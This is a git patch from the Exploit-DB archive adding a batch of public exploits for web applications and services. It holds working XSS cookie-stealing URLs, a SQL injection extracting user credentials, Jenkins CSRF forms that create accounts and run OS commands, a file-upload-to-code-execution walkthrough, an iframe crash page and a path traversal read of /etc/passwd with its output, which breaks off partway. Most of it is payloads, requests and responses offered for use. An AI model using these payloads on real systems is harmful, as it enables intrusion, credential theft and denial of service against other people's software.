From d891c95c0e07b13022a82b8d2d1bff1e363231df Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 29 Aug 2015 05:01:51 +0000
Subject: [PATCH] DB: 2015-08-29

11 new exploits
---
 files.csv                          |  11 +
 platforms/asp/webapps/37995.txt    |   9 +
 platforms/ios/dos/37997.txt        | 157 +++++++++
 platforms/java/webapps/37999.txt   | 162 +++++++++
 platforms/php/webapps/37991.txt    |  13 +
 platforms/php/webapps/37992.txt    |   9 +
 platforms/php/webapps/37993.txt    |   9 +
 platforms/php/webapps/37994.txt    |  11 +
 platforms/php/webapps/38000.txt    |  62 ++++
 platforms/php/webapps/38002.txt    | 384 +++++++++++++++++++++
 platforms/windows/dos/38001.py     | 515 +++++++++++++++++++++++++++++
 platforms/windows/remote/37996.txt |   9 +
 12 files changed, 1351 insertions(+)
 create mode 100755 platforms/asp/webapps/37995.txt
 create mode 100755 platforms/ios/dos/37997.txt
 create mode 100755 platforms/java/webapps/37999.txt
 create mode 100755 platforms/php/webapps/37991.txt
 create mode 100755 platforms/php/webapps/37992.txt
 create mode 100755 platforms/php/webapps/37993.txt
 create mode 100755 platforms/php/webapps/37994.txt
 create mode 100755 platforms/php/webapps/38000.txt
 create mode 100755 platforms/php/webapps/38002.txt
 create mode 100755 platforms/windows/dos/38001.py
 create mode 100755 platforms/windows/remote/37996.txt

diff --git a/files.csv b/files.csv
index 54cb61561..060e81845 100755
--- a/files.csv
+++ b/files.csv
@@ -34132,6 +34132,7 @@ id,file,description,date,author,platform,type,port
 37944,platforms/php/webapps/37944.txt,"vBSEO 'u' parameter Cross Site Scripting Vulnerability",2012-06-16,MegaMan,php,webapps,0
 37945,platforms/php/webapps/37945.txt,"SilverStripe 2.4.x 'BackURL' Parameter URI Redirection Vulnerability",2012-10-15,"Aung Khant",php,webapps,0
 37946,platforms/php/webapps/37946.txt,"WordPress Crayon Syntax Highlighter Plugin 'wp_load' Parameter Remote File Include Vulnerabilities",2012-10-15,"Charlie Eriksen",php,webapps,0
+38001,platforms/windows/dos/38001.py,"freeSSHd 1.3.1 - Denial of Service Vulnerability",2015-08-28,3unnym00n,windows,dos,22
 37798,platforms/windows/dos/37798.py,"XMPlay 3.8.1.12 - .pls Local Crash PoC",2015-08-17,St0rn,windows,dos,0
 37799,platforms/windows/local/37799.py,"MASM321 11 Quick Editor (.qeditor) 4.0g- .qse SEH Based Buffer Overflow (ASLR & SAFESEH bypass)",2015-08-17,St0rn,windows,local,0
 37800,platforms/windows/remote/37800.php,"Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064)",2015-08-17,"Mohammad Reza Espargham",windows,remote,0
@@ -34303,3 +34304,13 @@ id,file,description,date,author,platform,type,port
 37988,platforms/linux/local/37988.py,"BSIGN 0.4.5 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0
 37989,platforms/php/webapps/37989.txt,"IP.Board 4.X - Stored XSS",2015-08-27,snop,php,webapps,0
 37990,platforms/multiple/dos/37990.txt,"QEMU Programmable Interrupt Timer Controller Heap Overflow",2015-08-27,"Google Security Research",multiple,dos,0
+37991,platforms/php/webapps/37991.txt,"WANem Multiple Cross Site Scripting Vulnerabilities",2012-10-16,"Brendan Coles",php,webapps,0
+37992,platforms/php/webapps/37992.txt,"CorePlayer 'callback' Parameter Cross Site Scripting Vulnerability",2012-10-28,MustLive,php,webapps,0
+37993,platforms/php/webapps/37993.txt,"Joomla! 'com_quiz' Component SQL Injection",2012-10-30,"Daniel Barragan",php,webapps,0
+37994,platforms/php/webapps/37994.txt,"NetCat CMS Multiple Cross Site Scripting Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0
+37995,platforms/asp/webapps/37995.txt,"SolarWinds Orion IP Address Manager (IPAM) 'search.aspx' Cross Site Scripting Vulnerability",2012-10-31,"Anthony Trummer",asp,webapps,0
+37996,platforms/windows/remote/37996.txt,"Axigen Mail Server 'fileName' Parameter Directory Traversal Vulnerability",2012-10-31,"Zhao Liang",windows,remote,0
+37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service Vulnerability",2015-08-28,Vulnerability-Lab,ios,dos,3030
+37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0
+38000,platforms/php/webapps/38000.txt,"Wolf CMS Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80
+38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80
diff --git a/platforms/asp/webapps/37995.txt b/platforms/asp/webapps/37995.txt
new file mode 100755
index 000000000..f8f27572d
--- /dev/null
+++ b/platforms/asp/webapps/37995.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56342/info
+
+SolarWinds Orion IP Address Manager (IPAM) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+SolarWinds Orion IP Address Manager (IPAM) 3.0 is affected; other versions may also be vulnerable. 
+
+http://www.example.com/Orion/IPAM/search.aspx?q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27hi%27%29%3C%2Fscript%3E 
\ No newline at end of file
diff --git a/platforms/ios/dos/37997.txt b/platforms/ios/dos/37997.txt
new file mode 100755
index 000000000..13ad1ad60
--- /dev/null
+++ b/platforms/ios/dos/37997.txt
@@ -0,0 +1,157 @@
+Document Title:
+===============
+Photo Transfer (2) v1.0 iOS - Denial of Service Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1580
+
+
+Release Date:
+=============
+2015-08-20
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1580
+
+
+Common Vulnerability Scoring System:
+====================================
+3.4
+
+
+Product & Service Introduction:
+===============================
+Photo Transfer 2 is the easiest and fastest way to transfer photos (videos) from Camera Roll to computer or other iOS devices, and vice versa. 
+No need for USB cable, iTunes or extra equipment! 
+
+(Copy of the Vendor Homepage: https://itunes.apple.com/app/id1005399058 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a remote denial of service vulnerability in the official Photo Transfer 2 - v1.0 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2015-07-27:	Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Arvin Brook
+Product: Photo Transfer 2 - iOS Mobile Web Application 1.0
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+A remote denial of service vulnerability has been discovered in the official Photo Transfer 2 - v1.0 iOS mobile web-application.
+The issue allows local attackers to crash or shutdown the software client by usage of special crafted payloads.
+
+The vulnerability is located in the id value restriction of show module path context. Remote attacker can easily crash the application 
+remotly by including wrong and large id context in integer format. The attack vector is client-side and the request method to provoke 
+the mobile app crash is GET. The handling of the id path gets confused on negative integer values which results in a permanent app shutdown.
+
+The security risk of the denial of service vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.4. 
+Exploitation of the DoS vulnerability requires no privilege application user account or low user interaction. Successful exploitation of the 
+vulnerability results in an application crash or permanent app service shutdown.
+
+
+Vulnerable Module(s):
+				[+] ../show/
+
+Vulnerable Parameter(s):
+				[+] id
+
+
+Proof of Concept (PoC):
+=======================
+The remote denial of service web vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+Standard URL:
+http://localhost:3030/show/5
+
+
+PoC: Payload (Input to show Parameter)
+-9999999999999999999'
+
+
+PoC URL:
+http://localhost:3030/show/-9999999999999999999'
+
+
+PoC: Exploit
+<html>
+<head><body>
+<title>Photo Transfer 2 - remote Denial of Service Vulnerability</title>
+<iframe src=http://localhost:3030/show/-9999999999999999999'>
+<iframe src=http://localhost:3030/show/-1111111111111111111'>
+<iframe src=http://localhost:3030/show/-0000000000000000000'>
+</body></head>
+<html>
+
+
+Security Risk:
+==============
+The security risk of the remote denial of service vulnerability in the photo transfer 2 mobile app v1.0 is estimated as medium. (CVSS 3.4)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
+
+
diff --git a/platforms/java/webapps/37999.txt b/platforms/java/webapps/37999.txt
new file mode 100755
index 000000000..362bc8659
--- /dev/null
+++ b/platforms/java/webapps/37999.txt
@@ -0,0 +1,162 @@
+# Title: Jenkins 1.626 - Cross Site Request Forgery / Code Execution
+# Date: 27.08.15
+# Vendor: jenkins-ci.org
+# Affected versions: => 1.626 (current)
+# Software link: http://mirrors.jenkins-ci.org/war/latest/jenkins.war
+# Tested on: win64
+# Author: Smash_
+# Contact: smash [at] devilteam.pl
+ 
+Cross site request forgery vulnerability in Jenkins 1.626 allows remote attackers to hjiack the authentication of users for most request. Using CSRF it is able to change specific settings or even execute code on os as shown below.
+ 
+Examples:
+ 
+<html>
+  <!-- Change user descripton -->
+  <body>
+    <form action="http://127.0.0.1/jenkins/user/user/submitDescription" method="POST">
+      <input type="hidden" name="description" value="abc" />
+      <input type="hidden" name="json" value="&#123;"description"&#58;&#32;"abc"&#125;" />
+      <input type="hidden" name="Submit" value="Submit" />
+      <input type="submit" value="Go" />
+    </form>
+  </body>
+</html>
+ 
+<!-- // -->
+ 
+<html>
+  <!-- Add user -->
+  <body>
+    <form action="http://127.0.0.1/jenkins/securityRealm/createAccountByAdmin" method="POST">
+      <input type="hidden" name="username" value="csrf" />
+      <input type="hidden" name="password1" value="pass" />
+      <input type="hidden" name="password2" value="pass" />
+      <input type="hidden" name="fullname" value="Legit&#32;Bob" />
+      <input type="hidden" name="email" value="bob&#64;mail&#46;box" />
+      <input type="hidden" name="json" value="&#123;"username"&#58;&#32;"csrf"&#44;&#32;"password1"&#58;&#32;"pass"&#44;&#32;"password2"&#58;&#32;"pass"&#44;&#32;"fullname"&#58;&#32;"Legit&#32;Bob"&#44;&#32;"email"&#58;&#32;"bob&#64;mail&#46;box"&#125;" />
+      <input type="hidden" name="Submit" value="Sign&#32;up" />
+      <input type="submit" value="Go" />
+    </form>
+  </body>
+</html>
+ 
+<!-- // -->
+ 
+<html>
+  <!-- Delete user -->
+  <body>
+    <form action="http://127.0.0.1/jenkins/user/csrf/doDelete" method="POST">
+      <input type="hidden" name="json" value="&#123;&#125;" />
+      <input type="hidden" name="Submit" value="Yes" />
+      <input type="submit" value="Go" />
+    </form>
+  </body>
+</html>
+ 
+<!-- // -->
+ 
+<html>
+  <!-- Code execution #1
+          groovy: print "cmd /c dir".execute().text
+            -->
+  <body>
+    <form action="http://127.0.0.1/jenkins/script" method="POST">
+      <input type="hidden" name="script" value="print&#32;"cmd&#32;&#47;c&#32;dir"&#46;execute&#40;&#41;&#46;text&#13;&#10;" />
+      <input type="hidden" name="json" value="&#123;"script"&#58;&#32;"print&#32;&#92;"cmd&#32;&#47;c&#32;dir&#92;"&#46;execute&#40;&#41;&#46;text&#92;n"&#44;&#32;""&#58;&#32;""&#125;" />
+      <input type="hidden" name="Submit" value="Wykonaj" />
+      <input type="submit" value="Go" />
+    </form>
+  </body>
+</html>
+ 
+<html>
+  <!-- Code execution #2
+          groovy: print "cmd /c dir".execute().text
+            -->
+  <body>
+    <script>
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http://127.0.0.1/jenkins/computer/(master)/script", true);
+        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
+        xhr.setRequestHeader("Accept-Language", "pl,en-US;q=0.7,en;q=0.3");
+        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
+        xhr.withCredentials = true;
+        var body = "script=println+%22cmd+%2Fc+dir%22.execute%28%29.text&json=%7B%22script%22%3A+%22println+%5C%22cmd+%2Fc+dir%5C%22.execute%28%29.text%22%2C+%22%22%3A+%22%22%7D&Submit=Wykonaj";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+  </body>
+</html>
+ 
+ 
+Request:
+POST /jenkins/script HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/jenkins/script
+Cookie: JSESSIONID=E8F948238B2F4D6DAFAF191F074E6C3E; screenResolution=1600x900
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 178
+ 
+script=print+%22cmd+%2Fc+dir%22.execute%28%29.text%0D%0A&json=%7B%22script%22%3A+%22print+%5C%22cmd+%2Fc+dir%5C%22.execute%28%29.text%5Cn%22%2C+%22%22%3A+%22%22%7D&Submit=Wykonaj
+ 
+Response:
+HTTP/1.1 200 OK
+Date: Thu, 27 Aug 2015 18:06:55 GMT
+Server: Apache
+X-Frame-Options: SAMEORIGIN
+X-Content-Type-Options: nosniff
+Expires: 0
+Cache-Control: no-cache,no-store,must-revalidate
+X-Hudson-Theme: default
+X-Hudson: 1.395
+X-Jenkins: 1.626
+X-Jenkins-Session: 0ff3a92b
+X-Hudson-CLI-Port: 1834
+X-Jenkins-CLI-Port: 1834
+X-Jenkins-CLI2-Port: 1834
+X-Frame-Options: sameorigin
+X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoMa5pk8H/b/c/jIOBH+D8XGi2/1MUshSuGtK41S9ON67SRR1Dzmqlzhj+Hsgla6+NJDCFKqZf3aoQbgt8nVzQRkb12bjYPHMupa58SApxwIyvhRJaNq9jq+CcllEwt9m+N1JeCxeLork82LAbiDSBbPhHBGLzqA0a9hzKVTm80i9yiTqDoEK+WyK4m8AyqJFH/V4lkERKbSr2YK1u2sFGCuBaGAK/RYspmNmJSqj0c3lPEYeDsehTSn4PHpFrbsvKkHKD1RxNDRciSFMNY3RtxpBEhKxvJHkpy9HKF+ktYebwCMZ4J8LKnhkvwqJPgpqar3FuxX4Gsfwoy0/1oCtPQIDAQAB
+X-SSH-Endpoint: 127.0.0.1:1832
+Content-Type: text/html;charset=UTF-8
+Content-Length: 13468
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+(...)
+><link rel='stylesheet' href='/jenkins/adjuncts/0ff3a92b/org/kohsuke/stapler/codemirror/theme/default.css' type='text/css' /><h2>Rezultat</h2><pre> Wolumin w stacji C to Windows7_OS
+ Numer seryjny woluminu: D2DC-59F9
+ 
+ Katalog: C:\Bitnami\jenkins-1.626-0
+ 
+2015-08-27  18:51    <DIR>          .
+2015-08-27  18:51    <DIR>          ..
+2015-08-27  18:47    <DIR>          apache-tomcat
+2015-08-27  18:47    <DIR>          apache2
+2015-08-27  18:47    <DIR>          apps
+2015-08-27  18:49             9�751 changelog.txt
+2015-08-27  18:47    <DIR>          common
+2015-08-27  18:48    <DIR>          git
+2015-08-27  18:49    <DIR>          gradle
+2015-08-27  18:47    <DIR>          img
+2015-08-27  18:47    <DIR>          java
+2015-08-27  18:47    <DIR>          licenses
+2015-07-30  14:15         3�080�056 manager-windows.exe
+2015-08-27  18:50             1�102 properties.ini
+2015-08-27  18:49            12�118 README.txt
+2015-08-27  18:50    <DIR>          scripts
+2015-08-27  18:47             5�536 serviceinstall.bat
+2015-08-27  18:47             5�724 servicerun.bat
+2015-08-27  18:47    <DIR>          sqlite
+2015-08-27  18:51           268�031 uninstall.dat
+2015-08-27  18:51         7�038�369 uninstall.exe
+2015-08-27  18:50               166 use_jenkins.bat
+               9 plik(�w)         10�420�853 bajt�w
+              13 katalog(�w)  110�690�426�880 bajt�w wolnych
+</pre></div>
+(...)
\ No newline at end of file
diff --git a/platforms/php/webapps/37991.txt b/platforms/php/webapps/37991.txt
new file mode 100755
index 000000000..8f21d2ead
--- /dev/null
+++ b/platforms/php/webapps/37991.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/56326/info
+
+WANem is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+WANem 2.3 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/WANem/index-advanced.php/"><script>alert(document.cookie);</script><p+"
+
+http://www.example.com/WANem/index-basic.php/"><script>alert(document.cookie);</script><p+"
+
+http://www.example.com/WANem/status.php?interfaceList="><script>alert(document.cookie);</script><p+" 
\ No newline at end of file
diff --git a/platforms/php/webapps/37992.txt b/platforms/php/webapps/37992.txt
new file mode 100755
index 000000000..0a534f5a9
--- /dev/null
+++ b/platforms/php/webapps/37992.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56334/info
+
+CorePlayer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+CorePlayer 4.0.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/core_player.swf?callback=alert(document.cookie) 
\ No newline at end of file
diff --git a/platforms/php/webapps/37993.txt b/platforms/php/webapps/37993.txt
new file mode 100755
index 000000000..31356f471
--- /dev/null
+++ b/platforms/php/webapps/37993.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/56338/info
+
+The Quiz component for Joomla! is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_quiz&task=user_tst_shw&Itemid={RANDOM}&tid={RANDOM}/**/and/**/1=0/**/union/**/select/**/1,0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e,concat(username,0x3D,password)/**/from/**/jos_users+--+
+
+http://www.example.com/index.php?option=com_quiz&task=user_tst_shw&Itemid={RANDOM}&tid={RANDOM}/**/and/**/1=0/**/union/**/select/**/1,0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e,0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e+--+ 
\ No newline at end of file
diff --git a/platforms/php/webapps/37994.txt b/platforms/php/webapps/37994.txt
new file mode 100755
index 000000000..90b0d0fa4
--- /dev/null
+++ b/platforms/php/webapps/37994.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/56340/info
+
+NetCat CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+NetCat CMS 5.0.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/?� onmouseover=�prompt(document.cookie)�bad=�>
+
+http://www.example.com/search/?search_query=� onmouseover=prompt(document.cookie) bad=� 
\ No newline at end of file
diff --git a/platforms/php/webapps/38000.txt b/platforms/php/webapps/38000.txt
new file mode 100755
index 000000000..6378ec8b2
--- /dev/null
+++ b/platforms/php/webapps/38000.txt
@@ -0,0 +1,62 @@
+# Exploit Title    : Wolf CMS 0.8.2  Arbitrary File Upload To Command
+Execution
+# Reported Date    : 05-May-2015
+# Fixed Date       : 10-August-2015
+# Exploit Author   : Narendra Bhati
+# CVE ID           : CVE-2015-6567 , CVE-2015-6568
+# Contact:
+* Facebook         : https://facebook.com/narendradewsoft
+*Twitter           : http://twitter.com/NarendraBhatiB
+# Website          : http://websecgeeks.com
+# Additional Links -
+* https://github.com/wolfcms/wolfcms/releases/
+* https://www.wolfcms.org/blog/2015/08/10/releasing-wolf-cms-0-8-3-1.html
+
+#For POC -
+http://websecgeeks.com/wolf-cms-arbitrary-file-upload-to-command-execution/
+
+1. Description
+
+Every registered users who have access of upload functionality can upload
+an Arbitrary File Upload To perform Command Execution
+
+Vulnerable URL
+
+http://targetsite.com/wolfcms/?/admin/plugin/file_manager/browse/
+
+Vulnerable Parameter
+
+"filename"
+
+
+2. Proof of Concept
+
+A)Login as regular user ( who have access upload functionality )
+
+B)Go to this page  -
+http://targetsite.com/wolfcms/?/admin/plugin/file_manager/browse/
+
+C)Select upload an file option to upload Arbitary File ( filename ex:
+"hello.php" )
+
+D)Now you can access the file by here -
+http://targetsite.com/wolfcms/public/hello.php
+
+
+3. Solution:
+
+Update to version 0.8.3.1
+http://www.wolfcms.org/download.html
+
+=============
+
+-- 
+*Narendra Bhati "CEH" **( Facebook
+<http://www.facebook.com/narendradewsoft> , Twitter
+<http://www.twitter.com/NarendraBhatiB> , LinkedIn
+<https://www.linkedin.com/profile/view?id=115146074> , Personal Blog )*
+*Security Analyst - IT Risk & Security Management Services*
+Suma Soft Pvt. Ltd. | Suma Center | Near Mangeshkar Hospital | Erandawane
+Pune: 411004 |
+
+*======================================================================*
diff --git a/platforms/php/webapps/38002.txt b/platforms/php/webapps/38002.txt
new file mode 100755
index 000000000..cf4e337da
--- /dev/null
+++ b/platforms/php/webapps/38002.txt
@@ -0,0 +1,384 @@
+# Title: Pluck 4.7.3 - Multiple vulnerabilities
+# Date: 28.08.15
+# Vendor: pluck-cms.org
+# Affected versions: => 4.7.3 (current)
+# Tested on: Apache2.2 / PHP5 / Deb32
+# Author: Smash_ | smaash.net
+# Contact: smash [at] devilteam.pl
+
+Few vulnerabilities.
+
+Bugs:
+ - local file inclusion
+ - code execution
+ - stored xss
+ - csrf
+
+
+1/ LFI
+
+File inclusion vulnerability in pluck/admin.php in the in 'action' function allows  to include local files or potentially execute arbitrary PHP code.
+
+#1 - Request (count = en.php by default):
+POST /pluck/admin.php?action=language HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/pluck/admin.php?action=language
+Cookie: PHPSESSID=pb60nm4nq5a14spmt1aimdl525
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 49
+
+cont1=../../../../../../../etc/passwd&save=Save
+
+
+#1 - Response:
+HTTP/1.1 200 OK
+Date: Fri, 28 Aug 2015 21:01:47 GMT
+Server: Apache/2.2.22 (Debian)
+X-Powered-By: PHP/5.4.41-0+deb7u1
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 7374
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html;charset=utf-8
+(...)
+<div id="content">
+	<h2>language settings</h2>
+<div class="success">The language settings have been saved.</div>
+(...)
+
+#2 - Request:
+POST /pluck/admin.php?action=language HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/pluck/admin.php?action=language
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 47
+
+cont1=../../../../../../etc/passwd%00&save=Save
+
+#2 - Response:
+HTTP/1.1 200 OK
+Date: Fri, 28 Aug 2015 20:30:11 GMT
+Server: Apache/2.2.22 (Debian)
+X-Powered-By: PHP/5.4.41-0+deb7u1
+Set-Cookie: PHPSESSID=63erncd2l94qcah8g13bfvcga6; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 4503
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html;charset=utf-8
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/bin/sh
+bin:x:2:2:bin:/bin:/bin/sh
+sys:x:3:3:sys:/dev:/bin/sh
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/bin/sh
+man:x:6:12:man:/var/cache/man:/bin/sh
+lp:x:7:7:lp:/var/spool/lpd:/bin/sh
+mail:x:8:8:mail:/var/mail:/bin/sh
+news:x:9:9:news:/var/spool/news:/bin/sh
+uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
+proxy:x:13:13:proxy:/bin:/bin/sh
+www-data:x:33:33:www-data:/var/www:/bin/sh
+backup:x:34:34:backup:/var/backups:/bin/sh
+list:x:38:38:Mailing List Manager:/var/list:/bin/sh
+irc:x:39:39:ircd:/var/run/ircd:/bin/sh
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
+nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
+libuuid:x:100:101::/var/lib/libuuid:/bin/sh
+mysql:x:101:103:MySQL Server,,,:/nonexistent:/bin/false
+messagebus:x:102:106::/var/run/dbus:/bin/false
+colord:x:103:107:colord colour management daemon,,,:/var/lib/colord:/bin/false
+usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
+miredo:x:105:65534::/var/run/miredo:/bin/false
+ntp:x:106:113::/home/ntp:/bin/false
+Debian-exim:x:107:114::/var/spool/exim4:/bin/false
+arpwatch:x:108:117:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh
+avahi:x:109:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
+beef-xss:x:110:119::/var/lib/beef-xss:/bin/false
+dradis:x:111:121::/var/lib/dradis:/bin/false
+pulse:x:112:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false
+speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
+haldaemon:x:114:124:Hardware abstraction layer,,,:/var/run/hald:/bin/false
+iodine:x:115:65534::/var/run/iodine:/bin/false
+postgres:x:116:127:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
+sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin
+redsocks:x:118:128::/var/run/redsocks:/bin/false
+snmp:x:119:129::/var/lib/snmp:/bin/false
+stunnel4:x:120:130::/var/run/stunnel4:/bin/false
+statd:x:121:65534::/var/lib/nfs:/bin/false
+sslh:x:122:133::/nonexistent:/bin/false
+Debian-gdm:x:123:134:Gnome Display Manager:/var/lib/gdm3:/bin/false
+rtkit:x:124:136:RealtimeKit,,,:/proc:/bin/false
+saned:x:125:137::/home/saned:/bin/false
+devil:x:1000:1001:devil,,,:/home/devil:/bin/bash
+debian-tor:x:126:138::/var/lib/tor:/bin/false
+privoxy:x:127:65534::/etc/privoxy:/bin/false
+redis:x:128:139:redis server,,,:/var/lib/redis:/bin/false
